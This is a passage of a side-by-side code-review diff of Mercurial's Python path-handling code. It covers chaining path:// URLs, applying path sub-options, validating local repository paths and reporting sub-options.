695 | 711 | _path, sub_opts = ui.configsuboptions(b'paths', b'*') |
|
696 | 712 | self._own_sub_opts = {} |
|
697 | 713 | if suboptions is not None: |
|
698 | 714 | self._own_sub_opts = suboptions.copy() |
|
699 | 715 | sub_opts.update(suboptions) |
|
700 | 716 | self._all_sub_opts = sub_opts.copy() |
|
701 | 717 | |
|
702 | 718 | self._apply_suboptions(ui, sub_opts) |
|
703 | 719 | |
|
704 | 720 | def chain_path(self, ui, paths): |
|
705 | 721 | if self.url.scheme == b'path': |
|
706 | 722 | assert self.url.path is None |
|
707 | 723 | try: |
|
708 | 724 | subpath = paths[self.url.host] |
|
709 | 725 | except KeyError: |
|
710 | 726 | m = _(b'cannot use `%s`, "%s" is not a known path') |
|
711 | 727 | m %= (self.rawloc, self.url.host) |
|
712 | 728 | raise error.Abort(m) |
|
713 | 729 | if subpath.raw_url.scheme == b'path': |
|
714 | 730 | m = _(b'cannot use `%s`, "%s" is also defined as a `path://`') |
|
715 | 731 | m %= (self.rawloc, self.url.host) |
|
716 | 732 | raise error.Abort(m) |
|
717 | 733 | self.url = subpath.url |
|
718 | 734 | self.rawloc = subpath.rawloc |
|
719 | 735 | self.loc = subpath.loc |
|
720 | 736 | if self.branch is None: |
|
721 | 737 | self.branch = subpath.branch |
|
722 | 738 | else: |
|
723 | 739 | base = self.rawloc.rsplit(b'#', 1)[0] |
|
724 | 740 | self.rawloc = b'%s#%s' % (base, self.branch) |
|
725 | 741 | suboptions = subpath._all_sub_opts.copy() |
|
726 | 742 | suboptions.update(self._own_sub_opts) |
|
727 | 743 | self._apply_suboptions(ui, suboptions) |
|
728 | 744 | |
|
729 | 745 | def _validate_path(self): |
|
730 | 746 | # When given a raw location but not a symbolic name, validate the |
|
731 | 747 | # location is valid. |
|
732 | 748 | if ( |
|
733 | 749 | not self.name |
|
734 | 750 | and not self.url.scheme |
|
735 | 751 | and not self._isvalidlocalpath(self.loc) |
|
736 | 752 | ): |
|
737 | 753 | raise ValueError( |
|
738 | 754 | b'location is not a URL or path to a local ' |
|
739 | 755 | b'repo: %s' % self.rawloc |
|
740 | 756 | ) |
|
741 | 757 | |
|
742 | 758 | def _apply_suboptions(self, ui, sub_options): |
|
743 | 759 | # Now process the sub-options. If a sub-option is registered, its |
|
744 | 760 | # attribute will always be present. The value will be None if there |
|
745 | 761 | # was no valid sub-option. |
|
746 | 762 | for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): |
|
747 | 763 | if suboption not in sub_options: |
|
748 | 764 | setattr(self, attr, None) |
|
749 | 765 | continue |
|
750 | 766 | |
|
751 | 767 | value = func(ui, self, sub_options[suboption]) |
|
752 | 768 | setattr(self, attr, value) |
|
753 | 769 | |
|
754 | 770 | def _isvalidlocalpath(self, path): |
|
755 | 771 | """Returns True if the given path is a potentially valid repository. |
|
756 | 772 | This is its own function so that extensions can change the definition of |
|
757 | 773 | 'valid' in this case (like when pulling from a git repo into a hg |
|
758 | 774 | one).""" |
|
759 | 775 | try: |
|
760 | 776 | return os.path.isdir(os.path.join(path, b'.hg')) |
|
761 | 777 | # Python 2 may return TypeError. Python 3, ValueError. |
|
762 | 778 | except (TypeError, ValueError): |
|
763 | 779 | return False |
|
764 | 780 | |
|
765 | 781 | @property |
|
766 | 782 | def suboptions(self): |
|
767 | 783 | """Return sub-options and their values for this path. |
|
768 | 784 | |
|
769 | 785 | This is intended to be used for presentation purposes. |
|
770 | 786 | """ |
|
771 | 787 | d = {} |
|
772 | 788 | for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions): |
|
773 | 789 | value = getattr(self, attr) |
|
774 | 790 | if value is not None: |
|
775 | 791 | d[subopt] = value |
|
776 | 792 | return d |
General Comments 0
You need to be logged in to leave comments.
Login now